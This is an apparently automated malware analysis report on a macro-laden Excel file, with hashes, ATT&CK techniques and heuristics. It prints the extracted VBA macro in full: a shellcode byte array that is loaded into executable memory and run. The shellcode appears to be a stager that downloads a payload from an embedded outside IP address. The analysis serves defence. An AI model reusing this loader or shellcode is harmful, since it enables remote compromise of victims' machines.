Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 797f6559e483de12…

MALICIOUS

Office (OLE)

49.0 KB Created: 2017-12-04 12:03:32 Authoring application: Microsoft Excel First seen: 2017-12-09
MD5: 8bbd318290ea166e4289fe177fb89a68 SHA-1: 7d2f0b833cf478f76efad3005f5f277e4fae4caf SHA-256: 797f6559e483de12fd7cb24423aa9d10400005895c9e7a40739ebcc57f90bff9
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1059 Command and Scripting Interpreter

The sample is an Excel file containing VBA macros with an Auto_Open execution token, indicating it attempts to run code upon opening. The presence of VirtualAlloc API calls and the high-severity heuristic for VBA p-code auto-execution with execution tokens strongly suggests the macro is designed to allocate memory and execute shellcode. This shellcode is likely a downloader for a second-stage payload, but no specific URLs or further execution details were extracted.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5534 bytes
SHA-256: dfacf516e0e58dd52850b82e8c84f44d0139f731f58bf59f13067f53588039a0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
#If VBA7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Eqzzrhfx As Long, ByVal Qoari As Long, ByVal Vftma As LongPtr, Wkss As Long, ByVal Sqydcnj As Long, Zjynyit As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Zzgu As Long, ByVal Hapurdb As Long, ByVal Deej As Long, ByVal Ojxmvyzxk As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Raxcrvocu As LongPtr, ByRef Cjneft As Any, ByVal Sozfjen As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Eqzzrhfx As Long, ByVal Qoari As Long, ByVal Vftma As Long, Wkss As Long, ByVal Sqydcnj As Long, Zjynyit As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Zzgu As Long, ByVal Hapurdb As Long, ByVal Deej As Long, ByVal Ojxmvyzxk As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Raxcrvocu As Long, ByRef Cjneft As Any, ByVal Sozfjen As Long) As Long
#End If

Private Sub CommandButton1_Click()
Dim Fzdtqwu As Long, Xsyf As Variant, Zrh As Long
#If VBA7 Then
        Dim Dzdyfjwa As LongPtr, Iofpdfbf As LongPtr
#Else
        Dim Dzdyfjwa As Long, Iofpdfbf As Long
#End If
        Xsyf = Array(72, 131, 228, 240, 232, 204, 0, 0, 0, 65, 81, 65, 80, 82, 81, 86, 72, 49, 210, 101, 72, 139, 82, 96, 72, 139, 82, 24, 72, 139, 82, 32, 72, 139, 114, 80, 72, 15, 183, 74, 74, 77, 49, 201, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, _
11, 2, 15, 133, 114, 0, 0, 0, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 80, 139, 72, 24, 68, 139, 64, 32, 73, 1, 208, 227, 86, 72, 255, 201, 65, 139, 52, 136, 72, 1, 214, 77, 49, 201, 72, 49, 192, 172, 65, 193, 201, 13, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, _
208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 72, 1, 208, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, 72, 139, 18, 233, 75, 255, 255, 255, 93, 72, 49, 219, 83, 73, 190, 119, 105, 110, 105, 110, 101, 116, 0, 65, 86, 72, 137, 225, 73, 199, 194, 76, 119, 38, 7, _
255, 213, 83, 83, 72, 137, 225, 83, 90, 77, 49, 192, 77, 49, 201, 83, 83, 73, 186, 58, 86, 121, 167, 0, 0, 0, 0, 255, 213, 232, 11, 0, 0, 0, 53, 46, 57, 46, 55, 57, 46, 50, 49, 52, 0, 90, 72, 137, 193, 73, 199, 192, 81, 17, 0, 0, 77, 49, 201, 83, 83, 106, 3, 83, 73, 186, 87, 137, 159, 198, 0, 0, 0, 0, 255, 213, 232, 203, 0, 0, _
0, 47, 86, 113, 79, 115, 121, 50, 55, 110, 67, 68, 78, 50, 75, 88, 99, 114, 76, 65, 70, 117, 108, 103, 81, 90, 102, 89, 69, 116, 72, 83, 104, 107, 101, 102, 78, 70, 119, 83, 108, 67, 89, 52, 87, 104, 69, 116, 71, 75, 49, 73, 49, 54, 116, 119, 75, 122, 66, 109, 106, 88, 108, 70, 65, 55, 100, 98, 114, 90, 80, 103, 103, 66, 84, 86, 106, 69, 68, 80, _
87, 102, 81, 57, 73, 76, 90, 73, 108, 79, 107, 106, 84, 82, 79, 122, 114, 97, 77, 67, 49, 119, 86, 66, 54, 120, 89, 77, 68, 83, 105, 74, 104, 118, 90, 122, 100, 53, 57, 121, 117, 95, 65, 82, 104, 120, 121, 107, 120, 117, 110, 56, 77, 120, 65, 105, 115, 120, 95, 113, 77, 72, 112, 54, 48, 110, 100, 65, 87, 102, 67, 71, 105, 78, 84, 76, 71, 74, 105, 74, _
66, 110, 87, 84, 120, 69, 48, 66, 122, 86, 118, 57, 81, 115, 84, 102, 83, 50, 115, 79, 78, 110, 89, 82, 75, 114, 98, 67, 99, 106, 111, 87, 57, 78, 107, 111, 45, 108, 102, 77, 75, 119, 65, 0, 72, 137, 193, 83, 90, 65, 88, 77, 49, 201, 83, 72, 184, 0, 50, 160, 132, 0, 0, 0, 0, 80, 83, 83, 73, 199, 194, 235, 85, 46, 59, 255, 213, 72, 137, 198, _
106, 10, 95, 72, 137, 241, 106, 31, 90, 82, 104, 128, 51, 0, 0, 73, 137, 224, 106, 4, 65, 89, 73, 186, 117, 70, 158, 134, 0, 0, 0, 0, 255, 213, 72, 137, 241, 83, 90, 77, 49, 192, 77, 49, 201, 83, 83, 73, 199, 194, 45, 6, 24, 123, 255, 213, 133, 192, 117, 31, 72, 199, 193, 136, 19, 0, 0, 73, 186, 68, 240, 53, 224, 0, 0, 0, 0, 255, 213, 72, _
255, 207, 116, 2, 235, 173, 232, 86, 0, 0, 0, 83, 89, 106, 64, 90, 73, 137, 209, 193, 226, 16, 73, 199, 192, 0, 16, 0, 0, 73, 186, 88, 164, 83, 229, 0, 0, 0, 0, 255, 213, 72, 147, 83, 83, 72, 137, 231, 72, 137, 241, 72, 137, 218, 73, 199, 192, 0, 32, 0, 0, 73, 137, 249, 73, 186, 18, 150, 137, 226, 0, 0, 0, 0, 255, 213, 72, 131, 196, 32, _
133, 192, 116, 178, 102, 139, 7, 72, 1, 195, 133, 192, 117, 210, 88, 88, 195, 88, 106, 0, 89, 187, 224, 29, 42, 10, 65, 137, 218, 255, 213)

        Dzdyfjwa = VirtualAlloc(0, UBound(Xsyf), &H1000, &H40)
        For Zrh = LBound(Xsyf) To UBound(Xsyf)
                Fzdtqwu = Xsyf(Zrh)
                Iofpdfbf = RtlMoveMemory(Dzdyfjwa + Zrh, Fzdtqwu, 1)
        Next Zrh
        Iofpdfbf = CreateThread(0, 0, Dzdyfjwa, 0, 0, 0)
End Sub


Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True